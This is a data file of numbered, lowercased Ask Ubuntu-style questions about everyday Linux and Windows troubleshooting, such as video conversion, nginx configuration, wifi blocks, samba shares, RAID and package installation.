106501	video gets corrupt after converting ogv to any format using ffmpeg	i was trying to convert ogv video to avi using ffmpeg . it does convert without any error but the output video seems to be corrupt . does not matter which format i convert it to , out put is same as shown in screenshot . ffmpeg command : ffmpeg -i original.ogv -sameq converted.avi ffmpeg version : 0.7 ubuntu : 11.10 - 64 bit original video screenshot converted video screenshot
106502	an easy way to switch from apache to nginx	i use nginx as dav server and apache which hosts a frontend to backuppc . i 'd like to make nginx host the frontend insead of apache . but i do n't have a clue how to translate apache settings to nginx ones . can you help me with it ? is there a guide how to translate /etc/apache2/apache2.conf into /etc/nginx/nginx.conf despite apache2.conf is rather big , i found the only section related to the frontend . # include the virtual host configurations : include /etc/apache2/sites-enabled/ alias /backuppc /usr/share/backuppc/cgi-bin/ < directory /usr/share/backuppc/cgi-bin/ > allowoverride none allow from all # uncomment the line below to ensure that nobody can sniff importanti # info from network traffic during editing of the backuppc config or # when browsing/restoring backups . # requires that you have your webserver set up for ssl ( https ) access . # sslrequiressl options execcgi followsymlinks addhandler cgi-script .cgi directoryindex index.cgi authgroupfile /etc/backuppc/htgroup authuserfile /etc/backuppc/htpasswd authtype basic authname `` backuppc admin '' require valid-user < /directory >
106505	how to cancel holding of a package	i got a mid based on ubuntu os.the version if its software is pretty old.so i decide to upgrade the system.but apt-get upgrade does not work , it appears packages are prevented from upgrade.i can i unlock them thanks
106512	how to cure regular syslog error ?	i 'm getting regular errors in my syslog ( they 're occurring exactly every 10 minutes , to the second ) : feb 22 13:01:24 computer sm-mta [ 5747 ] : q1mbvo6b003778 : syserr ( root ) : hash map `` alias0 '' : missing map file /etc/mail/aliases.db : no such file or directory i do n't know how to interpret these errors , but am i right in guessing that the sm-mta [ 5747 ] part of of the error is the application name and process id ? if so , this would seem odd to me as i do not have sm-mta installed and system monitor does not have a process id with that number . i 'm probably being stupid as usual ! how can i find out what 's causing these errors and stop them from occuring , please ?
106516	lexmark intuition s505 scanner not detected by simple scan	first post here . i 've migrated from windows to ubuntu 11.10 - yeah ! i 've managed to get everything working except my scanner . it 's a lexmark intuition s505 and not listed at all here http : //www.sane-project.org/sane-mfgs.html # z-lexmark . could someone help me with the troubleshooting steps . i am a complete ubuntu newbie as it 's not listed i assume i should write to sane directly , but i want to make sure i 've completed basic troubleshooting first . e.g . it seems you can sudo an call xsane from the terminal , so more details would be appreciated should i raise a request with lexmark ? are there any driver files similar to those listed on how can i get an epson tx560wd scanner working ? that would help me ? i have simply scan but when i try to scan it says no scanner detected . i use he same lexmark intuition device as a printer which works like a charm .
106519	ubuntu one ( windows 7 ) not syncing folders other than the default one	i can sync the default `` ubuntu one '' folder without issues , it 's just other folders that i add that do n't sync at all . they show up on the web interface with a different grey icon but when i click on the links , they 're empty . i 'm running windows 7 , ubuntu one 2.0.3 , and i do have the `` sync locally '' option checked for the folders .
106520	why do my speakers play audio when my headset is plugged in ?	i just got a new pc and i am a bit confused . i have a gaming headset and when i plug it into my pc , i can hear just fine . however , i realized that my sound was also coming through the speakers as well . my speakers are set for default , and when i set my headset to the communications default.. i am left with sound only coming through my speakers . when i change my settings to make the headset the default , it 'll play through the speakers as it 's told , but once the headset is unplugged there is no longer sound coming from the speakers . when i do n't have the headset plugged in , i want sound from my speakers . when i have my headset plugged in , i want my sound to go only there . what can i do ? i just purchased a new pc and this was n't a problem . the speakers are n't new , nor is the headset.. so they are def working correctly . the sound card is realtek.. ( thats all i can tell from that.. its nothing fancy ) i also have windows 7 64 bit . the mobo is asrock pro 3 . my speakers and my headset are both analog . i do not have a usb headset . oh , and the drivers are all up to date . the headset is corsair hs1 . thanks so much !
106521	how to create & pin unity shortcut to a specific command / shellscript	this is not a duplicate as i 've spent a good while trying to find a solution from ask ubuntu and googling , to no avail . it is a specific problem after successfully pinning the shortcut to unity . the command i am attempting to pin is : rdesktop -u user -d domain -g 1380x849 -r sound : local -p password -x 0x80 -p -a 32 -k fi 192.168.1.103 alright , so the things i 've tried are : manually create rdesk.desktop that would use the application rdesktop with some command parameters to connect to a remote machine and automatically log in . i can successfully drag this launcher to unity . create a launcher via the main menu utility , hitting the ubuntu icon and launching the session from there , then pinning the actual rdesktop icon that appears upon launch . both methods work partly . i can get a nice shortcut with the icon of my choice into the task bar with ( 1 ) , but upon clicking this shortcut a second ( actual rdesktop ) icon pops to the bottom of the unity bar . pinning this second icon works , but it does n't actually do anything once clicked after i 've closed the session . the pinned icon from the ( 2 ) method acts exactly the same . on mouse over , the second icon shows me : rdesktop - 192.168.1.103 how can i create a shortcut to the rdesktop command with parameters , and pin it to unity so the icon i click gets highlighted and responds to clicks even after closing the session ? alternatively i guess i could somehow edit the second pinned icon to work with the correct parameters so that rdesktop would actually open , i just could n't find it anywhere in the file system to take a peek . edit : here 's my .desktop entry which i dragged into unity [ desktop entry ] name=remotedesktop client comment=connect to a remote windows terminal-server exec=rdesktop -u name -d domain -g 1380x849 -r sound : local -p password -x 0x80 -p -a 32 -k fi 192.168.1.103 icon=/usr/share/icons/hicolor/scalable/apps/nm-device-wired.svg terminal=false hidden=false type=application version=1.0 encoding=utf-8 here 's a screenshot for clarification : upper black highlighted one is my .desktop , and the lower is what i get when i click it . the upper actually will only work once , and if i unpin it and redrag it to unity , it will work again , one time .
106522	how to remove console-tools completely ?	after removing console-tools using apt-get -- purge remove console-tools i am getting the following error during boot init : failed to spawn console-setup main process : unable to execute : no such file or directory fsck from util-linux-ng 2.17.2 fsck from util-linux-ng 2.17.2 so it looks like remove messed up to correctly remove console-tools package . how to get rid of this error message ? i 'm using 10.04 server edition .
106527	how to move ubuntu installation from one hdd to another ?	i currently have ubuntu 10.04 server running on portable hdd . want to move it to internal sata hdd . i 've got 3 partitions / , /home and swap . on new hdd i plan to have different partition sizes . what 's correct way of doing these 2 things ( move , resize ) ?
106528	embed terminal on desktop positioning	this is my script to embed terminal in my desktop , but how do i make it appear in the corner next to the unity launcher ? # ! /bin/bash sleep 20 & & gnome-terminal -- window-with-profile=trans777 &
106532	how do i install postgresql-8.3 ?	i get > sudo apt-get install postgresql-8.3 reading package lists ... done building dependency tree reading state information ... done package postgresql-8.3 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'postgresql-8.3 ' has no installation candidate i need v8.3 to match my production server ( heroku ) . thanks !
106534	error when opening terminal	i have this error when opening any terminal windows : bash : /dev/cgroup/cpu/user/32215/tasks : file o directory non esistente bash : /dev/cgroup/cpu/user/32215/notify_on_release : file o directory non esistente malik @ malik-desktop : ~ $ what is this and how to solve ? it does n't seem to affect anything but it ' annoying . googling a bit lead me to sites talking about 200 lines kernel patch . i 'm on 10.04 lts . i went from 10.10 to 11.10 maintaining the /home and then rolled back to 10.04 with same /home . / formatted .
106535	want to write a simple svn update bash script	i want to write a simple bash script that will update an svn working copy in a given directory . the repository is accessed with the svn+ssh protocol . the basic process this needs to follow is : # ! /bin/bash # temporarily relax firewall iptables -i output -p tcp -- dport 12345 -j accept svn up /path/to/working/copy # prompt for ssh password will be here # close firewall again iptables -i output -p tcp -- dport 12345 -j reject what i 'm stuck on his how to tell my bash script to supply the password to ssh when prompted . typing the password on the line after the svn up command , predictably , does n't work . is this even possible ? if not , alternative ways of achieving this goal will be appreciated . p.s . i know i should be using ssh public/private key authentication , but the person who runs the server that hosts the svn repo is n't interested in setting this up for me !
106536	how do i rebind `` initiate window move '' to mouse button 10 ?	i am trying to use button 10 on my mouse to drag windows around . i have installed ccsm and changed the initiate button in the plugin `` move window '' to `` button10 '' ( with no modifier , though adding modifier keys to test does not help ) . i know that the desired button is number 10 because xev reports buttonpress event , serial 36 , synthetic no , window 0x4000001 , root 0x15d , subw 0x0 , time 8361012 , ( 77,129 ) , root : ( 1812,182 ) , state 0x0 , button 10 , same_screen yes buttonrelease event , serial 36 , synthetic no , window 0x4000001 , root 0x15d , subw 0x0 , time 8361286 , ( 77,129 ) , root : ( 1812,182 ) , state 0x0 , button 10 , same_screen yes when i click that button in its window . there is no effect when pressing button 10 with these settings . however , i know that i 'm changing the correct setting , as switching from the default of alt+button1 to e.g . ctrl+alt+button1 does take effect . edit : output of xinput list -- long 10 as requested by braiam . logitech gaming mouse g400 id=10 [ slave pointer ( 2 ) ] reporting 5 classes : class originated from : 10 . type : xibuttonclass buttons supported : 16 button labels : `` button left '' `` button middle '' `` button right '' `` button wheel up '' `` button wheel down '' `` button horiz wheel left '' `` button horiz wheel right '' `` button side '' `` button extra '' `` button forward '' `` button back '' `` button task '' `` button unknown '' `` button unknown '' `` button unknown '' `` button unknown '' button state : class originated from : 10 . type : xivaluatorclass detail for valuator 0 : label : rel x range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 1 : label : rel y range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xivaluatorclass detail for valuator 2 : label : rel vert wheel range : -1.000000 - -1.000000 resolution : 1 units/m mode : relative class originated from : 10 . type : xiscrollclass scroll info for valuator 2 type : 1 ( vertical ) increment : -1.000000 flags : 0x2 ( preferred )
106537	is locate output directory-dependent ?	when i 'm in my home directory and type locate *.cpp i get hundreds of results . using the same command in ( for example ) ~/../forfun/netstream/ , i see only a few results . how is this possible ?
106539	how to remove a locale ( i.e . to drop it from ` $ language` variable ) ?	for some reason i have an extra unneeded language installed on my system ( more precisely , $ language variable is ru : en_ca : en where supposed to be ru : en , and also apt tries to load addresses like http : //ppa.launchpad.net precise/main translation-en_ca ) . how can i remove the unneeded en_ca language ? language-selector does n't have an option to remove a language localepurge does n't help do n't think i 'm fake dmitry shachnev , i just had to drop my previous accountâś
106544	kile crashes upon closing project	kile allows me to work , but it keeps crashing every time i close a project . it also crashes when i close kile directly . since i need to kill the program in order to exit , i can save the individual document info but i lose the changes in project data . therefore when kile is restarted the same project is open , and the same documents are active .
106548	boot fails - pulseaudio	i 'm using ubuntu for the first time and i 'm new in the linux world .. after successfully installing 11.10 as second system besides xp this morning ubuntu now gets stuck when booting . right after the grub the following screen appears : starting bluetooth [ ok ] pulseaudio configured for per-user sessions saned disablel ; edit /etc/default/saned [ ok ] nothing else happens afterwards , the boot seems to be stuck . any idea ? thanks a lot !
106549	my ubuntu freezes when i start it	well when i start my ubuntu it looks like it works fine but i ca n't click any feature in the screen . i already tried it with two mouses and the arrow moves but i ca n't click anything in the screen . what should i do to make it work again ? ? i am new and i just installed ubuntu in my pc . may you help me please ? ? i will be always grateful
106556	menu in the top bar wo n't stay opened when clicked	the menu in the top bar ( i believe it 's called global menu or application menu , not sure ) opens when i press mouse button on it , but immediately closes when i release it . this makes it hard to use , because i have to keep the mouse button pressed all the time i navigate the menu . how do i switch the behaviour so the menu stays opened when i click it ? also , this weird behaviour started some time ago , it was n't always like that . i do n't know what triggered it .
106557	horizontal disturbance while playing videos in ubuntu 11.10	i 'm a total noob guys , so please bear with me . i will try to make it as succinct as possible . whenever i try to play some of my videos ( not happening with all ) , regardless of the video format , there is a horizontal line of disturbance on the top of the video , usually 2-3 cm down from the top . well , it is only noticeable when the video is in full screen mood and i have no idea how to describe the problem . i hope it is something that can be fixed easily . i googled it without luck . is there any solution to this ? btw i am running ubuntu 11.10 64-bit on dell inspiron n5050 .
106558	map ubuntu drive to windows machine	so there is plenty of answers to the opposite question but i need to be able to access and modify my files on my ubuntu machine from my windows 7 machine . what have i tried already ? it looks like i have samba installed ( somehow ) but i 've spent so much time just now installing packages to install other packages , fixing installs and finding out what and why i do n't have parts of some packages installed to enable other things to be installed that i just do n't know ! ( i 'm a bit of an ubuntu newb in case you ca n't see ... ) my /etc/samba/smb.config has been modified to look like this : # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username [ homes ] comment = home directories browseable = yes # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . read only = no ... # this might need tweaking when using external authentication schemes valid users = % s restart samba sudo service smbd restart . now back in my windows machine i try and map to my ubuntu drive with \\ [ my-machine-name ] \ [ my-machines-admin-user ] . the little dialog comes up asking me for a network username and password so i enter the credentials aaaaaaand ... it tells me that it is no good . i can see the user i am logging in with is not just [ ubuntu-username ] but [ my-windows-machine ] \ [ ubuntu-username ] ... ? ? i 'm tired , any help ? there 's not too much info out there on the web for this . thanks !
106563	how to set `java_home` to point to a jdk installation ?	i installed sun-java6-jdk . i need to find it 's home directory , java_home must point to a jdk installation , not jre .
106568	my wireless has suddenly became disabled by hardware switch , bios , rfkill , fn+f8 do nothing	i have a toshiba l655d-s5145 . there is no physical toggle for the wireless , although the f8 key is supposed to do the trick . it does n't . the wireless has been working since october , and suddenly , nothing . rfkill reports that the wireless is hard blocked , but unblock wifi , unblock 0 , unblock all do nothing . i inserted a usb dongle , and that is also disabled by hardware switch , although rfkill reports that it is neither hard nor soft blocked . my onboard wireless is 02:00.0 network controller : realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) according to lspci . lsmod reports that these drivers are loaded . rtl8192c_common 75767 1 rtl8192ce rtlwifi 110972 1 rtl8192ce i resorted to reformatting the drive and reinstalling , but that also did not work . in bios i restored system defaults as there is no specific entry for wifi . before reinstalling a pure xubuntu i went into unity and saw that the airplane mode was on and despite being toggled off , it returned to the on position . i 'm not sure where to find airplane mode in xubuntu . what else can i do ? i need my wireless .
106569	installing ubuntu natty on hp g7-1310us problems : (	i just purchased hp g7-1310us and tried to install natty but ran into two problems . 1 ) i boot from livecd and ubuntu runs fine no video problem what so ever ( i had to close the lid and open and then disply would show up ) . after that i used install option and then screen becomes blank after a while . i read the other thread , ( is it possible to install ubuntu 11.10 ( oneiric ocelot ) on an hp pavilion g7 notebook ? ) setting nomodeset kernel option but it did not help to resolve black screen . i also tried wubi installation method but the same result with the same problem . i tried installing 12.04 from livecd as well as wubi but no go . 2 ) i tried to install from livecd ( non-wubi method ) but i can not create extended partition as hd already has 4 primaray partitions : came with preinstalled win7 , hprecovery , hp tools and the other primary partiton . how can i install using this pre-existing 4 primary partition ? any suggestion . here is the display of the video card display that does not tell me anything as far as manufacturer goes : ubuntu @ ubuntu : ~ $ sudo lshw -c display ; lsb_release -a ; uname -a *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : c0000000-c03fffff memory : b0000000-bfffffff ioport:4000 ( size=64 ) no lsb modules are available . distributor id : ubuntu description : ubuntu precise ( development branch ) release : 12.04 codename : precise linux ubuntu 3.2.0-17-generic # 26-ubuntu smp fri feb 17 21:35:49 utc 2012 x86_64 x86_64 x86_64 gnu/linux
106575	how can i resolve a 'windows backend : object has no attribute iso_path ' error while installing with wubi ?	i 'm trying to install ubuntu using wubi in windows xp professional sp3 32bit . after running wubi i receive an installation error . `` windows backend '' object has no attribute 'iso_path ' ... .for more information , please see the log file : c : \documents and settings\rickh\locals settings\temp\wubi-11.10-rev241.log . log : 02-22 10:44 debug tasklist : # # finished create_uninstaller 02-22 10:44 debug tasklist : # # running copy_installation_files ... 02-22 10:44 debug windowsbackend : copying c : \docume~1\rickh\locals~1\temp\pyl70.tmp\data\custom-installation - > c : \ubuntu\install\custom-installation 02-22 10:44 debug windowsbackend : copying c : \docume~1\rickh\locals~1\temp\pyl70.tmp\winboot - > c : \ubuntu\winboot 02-22 10:44 debug windowsbackend : copying c : \docume~1\rickh\locals~1\temp\pyl70.tmp\data\images\ubuntu.ico - > c : \ubuntu\ubuntu.ico 02-22 10:44 debug tasklist : # # finished copy_installation_files 02-22 10:44 debug tasklist : # # running get_iso ... 02-22 10:44 debug tasklist : new task copy_file 02-22 10:44 debug tasklist : # # # running copy_file ... 02-22 10:46 debug tasklist : # # # finished copy_file 02-22 10:46 debug tasklist : new task check_iso 02-22 10:46 debug tasklist : # # # running check_iso ... 02-22 10:46 debug commonbackend : checking c : \ubuntu\install\installation.iso 02-22 10:46 debug distro : checking ubuntu iso c : \ubuntu\install\installation.iso 02-22 10:46 debug distro : wrong size : 2119696384 > 900000000 02-22 10:46 debug tasklist : # # # finished check_iso 02-22 10:46 error tasklist : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path' 02-22 10:46 debug tasklist : # cancelling tasklist 02-22 10:46 error root : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 120 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path' 02-22 10:46 debug tasklist : # finished tasklist
106586	gnome application does n't use the system input method	i set my system input method to gcin with im-switcher . but when i use some gnome based application , such as gedit and gnome-terminal , my default input method is still simple ( i.e . i can type only english letter ) . but in other applications , like chrome , i can use gcin and everything works well . why does gnome have a different input method setting ? and how can i change it ?
106587	what is the use of the workspaces ?	i was wondering what use are the workspaces at all , if any . i notice that when i switch to another workspace , all the apps still show in the unity bar and all the icons are still present in the taskbar , and clicking on them takes me to the workspace with those windows . so really , why would i ever care to switch it , and for what purpose ? it would have made sense if switching windows completely gave be an empty unity bar where i can start multiple , independent instances of various applications .
106597	no sound after upgrading to vlc 2.0.1	every sound is working on my 11.10 64bit machine except of vlc . i upgraded via the n-muench ppa from 1.1 to 2.0 and since that moment there is no sound anymore . the only sound bits i get are strange distorted sounds . any ideas what is wrong ? alsa recognises vlc and its demand for sound . the console does not say a word about sound .
106603	can i have shortcuts for applications in the upper panel ?	i want to have a quick launch button for the command xkill ( skype sometimes starts using all my ram and i have to kill it . ) in my upper panel . is this possible in 11.10 with unity ? i
106610	dual boot with windows 7 issue : windows occasionally restarts at startup	the installation went smooth and everything works fine with ubuntu . the issue is as follows : when i boot into windows 7 , it shows the windows logo and start loading and suddenly restarts . luckily , this does not happen always , after a few restarts it does startup properly . what seems to be the problem ?
106613	changing the start menu icon in xubuntu	i 'm trying to change the appearance of my desktop and i was wondering if there was a way to change the icon for the start menu , in xubuntu , from a mouse to something else ?
106614	how to downgrade ubuntu ?	i installed ubuntu 12.04 lts and , well , it was fun to test but right now i just want to downgrade to 11.10 again . is there a way to do this ?
106616	is ubuntu sniff proof out of the box ?	i just found out about xinput and how it proves any gui 's running on the same x-session can sniff each other . is there a support team for each app included in the ubuntu repo 's that checks for sniff code ? i can imagine there must be specific libraries and commands in respective languages in the source that would identify sniffing attempts . if we are protected from these sort of apps for the most part , the only other thing i can think of are networking apps . for example , scripts that may launch inside of firefox that ships with ubuntu . does the end user have to install a firefox add-on to actually get a sniffer inside of ubuntu or could just some script from a webpage inject sniffing of the x-session ? or both ? should we be concerned with torrent programs such as transmission or deluge ? is there anyway to log processes that are getting keyboard , mouse , x-screen events to know what is paying attention ?
106619	encfs home directory : ssh access dismount after a while	i 've setup an encrypted homedir according to this encryptedhomedirectoryhowto . to gain ssh access i 've added auth required pam_encfs.so to /etc/pam.d/sshd $ cat /etc/pam.d/sshd | egrep -v ^ # auth required pam_env.so # [ 1 ] auth required pam_env.so envfile=/etc/default/locale auth required pam_encfs.so @ include common-auth account required pam_nologin.so @ include common-account @ include common-session session optional pam_motd.so # [ 1 ] session optional pam_mail.so standard noenv # [ 1 ] session required pam_limits.so it does work for a short time after login but after 5-10min the homedir will be unmounted . if i 'm logged in locally everything is working fine . even ssh from an other machine . it seems like unmount is done everytime cron is starting : /var/log/auth feb 22 19:01:01 xxxxx sshd [ 12746 ] : accepted password for user from xxx.xxx.xxx.xxx port 39769 ssh2 feb 22 19:01:01 xxxxx sshd [ 12746 ] : pam_unix ( sshd : session ) : session opened for user user by ( uid=0 ) feb 22 19:05:01 xxxxx cron [ 13248 ] : pam_unix ( cron : session ) : session opened for user root by ( uid=0 ) feb 22 19:05:01 xxxxx cron [ 13248 ] : pam_unix ( cron : session ) : session closed for user root
106620	how can i add xkill in the unity launcher ?	i would like to add the command xkill to the unity launcher so i can just click on it to kill a program . how can i do that ?
106624	tools for 3d animations , models , skeletons and other animation techniques	i am looking for apps in ubuntu that i can work to create 3d animations , models and other similar stuff . similar for example to maya and 3d studio in windows . with which apps can i count on .
106626	app for advance sound editing ( alternative to cool edit pro )	looking for an alternative to cool edit pro which is a sound editing software for windows that can do a lot for sound . any tool in ubuntu that helps me edit sound , channels , etc.. as close or advance as cool edit pro is or similar programs .
106627	how can i select a whole folder to upload when using ubuntu one files for android ?	if i want to sync my phone 's data to my desktop , how can i select full folders ? there is the opportunity to add some files , but i 'll have to have it synced just like the phone 's pictures are bundled in one folder . where 's the option ? even with the use of custom explorers i ca n't see it . using ubuntu 11.10 and a samsung galaxy s2
106632	adding replaygain tags	i have been always using foobar2000 to add replaygain tags to my music library ( consisting of .mp3 or .ogg files ) . on my new computer i would like to avoid installing wine for just this task . are there any native tools that i can use for the same purpose ? i do n't mind if they are command-line only , or to use two different programs for mp3 and ogg , but i want to be absolutely certain that they only write a tag and do not mess with the original file otherwise , e.g . by actually reencoding at a different volume .
106633	wpa_supplicant ioctl [ siocsiwencodeext ] : invalid argument	i just installed ubuntu server on a spare computer with a broken graphic card , and i needed to setup my wifi . i thought no problem , i 've done it before from the command line , in arch linux. , only the steps i had to take in arch linux did n't work in ubuntu server ( that 's odd , was n't ubuntu supposed to be so much more user-friendly ? : / ) . this is what i 'd normally do : ip link set wlan0 up wpa_passphrase < essid > < wpa key > > /etc/wpa_supplicant.conf wpa_supplicant -b -dwext -i wlan0 -c /etc/wpa_supplicant.conf dhcpcd wlan0 only at the wpa_supplicant i get some strane message : ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument and if i try to run dhcpcd then ( which i manually installed , as it did n't come preinstalled with ubuntu server ) , it times out . help on how to do it would be much appreciated . my wireless driver is iwl3945 .
106636	add wrong device to software raid ?	a few days ago my raid5 had an crash . i replaced the hdd and add the wrong device to the raid ( i add the device and not the partition ) now the raid seems to work with follow config : md0 : active raid5 sde1 [ 4 ] sdd1 [ 3 ] sdc [ 5 ] sdb1 [ 1 ] sda1 [ 0 ] 7814051840 blocks super 1.2 level 5 , 512k chunk , algorithm 2 [ 5/4 ] [ uu_uu ] [ > ... ... ... ... ... ... .. ] recovery = 1.0 % ( 20819448/1953512960 ) finish=865.7min speed=37205k/sec my question is what happend to sdc ? why it 's important first to create a fd partition and to add sdc1 instead of sdc ? what could happend with my configuration ?
106639	sound out of the internal pc speaker	my problem is that on my system hp/dc7900 , i have always the same sound like on my sound card on the internal pc speaker . i check all settings and do n't find an option to disable the internal pc speaker . is there any solution for this problem ?
106642	how to fix sudo : setreuid ( root_uid , user_uid ) : operation not permitted error ?	i am using ldap authentication on my ubuntu 11.10 server . i installed libpam-ldap , and configured things accordingly . it works great , except that i get this error every once in a while when i try to sudo : sudo : setreuid ( root_uid , user_uid ) : operation not permitted i know i have sudoers set up correctly , since it works most of the time . it 's not just my log in either , others have the same problem when i have it . when this error is occurring , i ca n't ssh in with my regular system user at all . when i sign in directly , i ca n't get any gnome-terminal to start . once i restart the server , the problem goes away . 'course , that 's not a solution , if it was a prod server , i 'd be in trouble . how do i fix this ? edit 3/1/12 : i just figured out that if stop and start the nscd service , the problem goes away . service nscd stop service nscd start not much of a solution since i have to be logged into the server directly , not via ssh .
106647	trouble with an usb modem on ubuntu 11.10	i need to connect my laptop using an usb modem . i have tried the modem on a windows 7 machine and it works fine , so i regard my trouble is software related . but i use ubuntu 11.10 on daily basis , so i need to make it work on ubuntu 11.10 . before connecting the modem i clear up the messages with : sudo dmesg -c then i connect the modem , wait for a moment and execute dmesg one more time . this is the result : [ 91378.255708 ] usb 3-1 : new high speed usb device number 5 using xhci_hcd [ 91378.272193 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 91378.272318 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 91378.272410 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 91378.274833 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 91378.274953 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 91378.412746 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 91378.412854 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 91379.410604 ] usb 3-1 : usbfs : usbdevfs_control failed cmd mtp-probe rqt 128 rq 6 len 1024 ret -110 the modem is actually detected : : $ lsusb | grep -i modem bus 003 device 006 : id 047e:2892 agere systems , inc. ( lucent ) systems soft modem but gnome-ppp wo n't see it . update following the comment from scott , i think i should rephrase my question to this : have anyone figure out the right switchmode command for the agere modem 047e:2892 ? any ideas ? best regards , manuel .
106649	ubuntu 11.10 wubi internet problems	i have ubuntu 11.10 wubi installed on a vm , and it has suddenly stopped being able to connect to the internet , it says connected , but the vm says there are no active ip addresses and it 's not pingable ... i have no idea whats causing this ... it 's not the vm becuase windows on the same vm works fine ... any ideas ?
106650	missing panel on my second monitor , any fix ?	i 've turned on my computer to awaken to no top bar on my second monitor . however , it was there before i shutdown the day before . i do n't remember touching anything to do with my monitors and would like to know if there is a fix for this ? i would really like it back : )
106651	dpkg install environment	i 'm trying to creat a .deb that , as part of its installation process , pings an external server . so i have an install_foobar script which does the install . however , i ca n't get install_foobar to curl out to the server , or , for that matter , echo out to /tmp . what is the environment that is created ? i am wondering if its some sort of pbuilder-esque world that is removed after the install finishes ...
106666	is there a way to make a file that would run a terminal command when you click it ?	is there a way to make a file that would run a terminal command when you click it ? similar to a .bat extension in windows ?
106675	unity or unity2d , which will be fastest on a high spec computer ?	i have a decent laptop . i7 quad 2.8 , 8gb ram , and nvidia nvs3100m . i wonder which of unity 3d and 2d that would be fastest on my system . sure its hard to tell . and the question i 'm seeking answer for is the following . 2d has no 3d effects , bing . but does the 2d desktop execute more work on the cpu rather on the gpu which the 3d desktop . all i want is a snappy desktop , i would love to have a mode , like no effects in the unity 3d . in windows you can choose `` no effects '' which makes everything look terrible but it still an improvement in speed . so would unity 2d clutter the cpu more then unity 3d ?
106677	unable to start xampp in ubuntu 11.04	when i try to start xampp with /opt/lampp/lampp start command it gives me a message like this . starting xampp for linux 1.7.7 ... xampp : another web server daemon is already running . xampp : xampp-mysql is already running . xampp : xampp-proftpd is already running . xampp for linux started . then i type this on terminal : sudo netstat -pant | egrep `` :80 . * listen '' then message show as like as : tcp6 0 0 : ::80 : : : * listen 1117/apache2 then assume that i have another apache that have to uninstall . then try this one : sudo aptitude remove apache2 then message show on terminal as like as : : sudo : aptitude : command not found what can i do ?
106683	any really decent way to get three monitors ?	what satisfactory solutions are there to achieve three monitors on ubuntu ? i know some ati cards ( eyefinity ) can support 3 monitors from a single card , but i do n't know how well this is supported under linux and besides , i 've never had much luck with ati on linux . the alternative is to try two cards , but there seem to be problems there too . it looks to me like xrandr can not support 2 gpus . i believe you 'll end up with two separate `` screens '' across which you can not move applications or windows , unless you enable xinerama which as i understand it disables some acceleration and probably compositing too . i 've found so much conflicting information on this online , i 'm really confused . please advise !
106684	is it possible to use gksu from the dash ( use administrative level from dash )	i know i can press alt+f2 and type for example gksu nautilus but i want to be able to use it from dash . how can i do this ?
106686	nvidia geforce 6150-unity 3d wo n't work	the nvidia geforce 6150 does not work with unity . what should i do to fix it ? i am using ubuntu 11.10 .
106691	will installing ubuntu on one partition affect the files on another ?	if i create a partition to backup files in windows before installing ubuntu , is that partition safe after installing ubuntu ? also i plan on replacing windows 7 with ubuntu .
106692	devede wo n't open in ubuntu 11.10	after installing the latest version of vlc player i found that devede had been removed & would not re-install . after following some advice on this site i managed to purge vlc completely & re-install devede but now when i try to launch it i get a message saying the program ca n't find mencoder & will not work without it . i have uninstalled & re-installed mencoder several times in synaptic to no avail , devede still says it ca n't find mencoder . any advice ?
106693	unable to install kde in ubuntu 11.10	i want to install kde but i ca n't ! ! when i mark kde-full in synaptic to install it returns this error kde-full : depends : kde-plasma-desktop but it is not going to be installed depends : kde-plasma-netbook but it is not going to be installed depends : kdeartwork but it is not going to be installed depends : kdeedu but it is not going to be installed depends : kdepim but it is not going to be installed depends : kdeplasma-addons but it is not going to be installed recommends : kde-standard but it is not going to be installed recommends : kdesdk but it is not going to be installed recommends : kdewebdev but it is not going to be installed i have these packages in synaptic but i think they are newer version of them ! is it the point ? what should i do ? how do i get lower version of packages ? or how to get index of lower version of packages ?
106695	remote camera security	for ubuntu 11.04 i need an application that will monitor and record 4 cctv cameras w/sound . need playback of the recorded activity with timestamp . it should be able to control zoom and camera angle via joystick or mouse . it would be nice to have it stream live feed over ssh too . minimal resources available .
106700	unable to install ubuntu 11.10 desktop	i tried installing ubuntu on my hp compaq & sony vaio vpc , but without success . on the hp i get only error lines during the bios load and on the vaio just a black screen . trying to install using wubi also appears to be a problem . getting permission denied or unknow error as a response . what am i supposed to do now ? thanks !
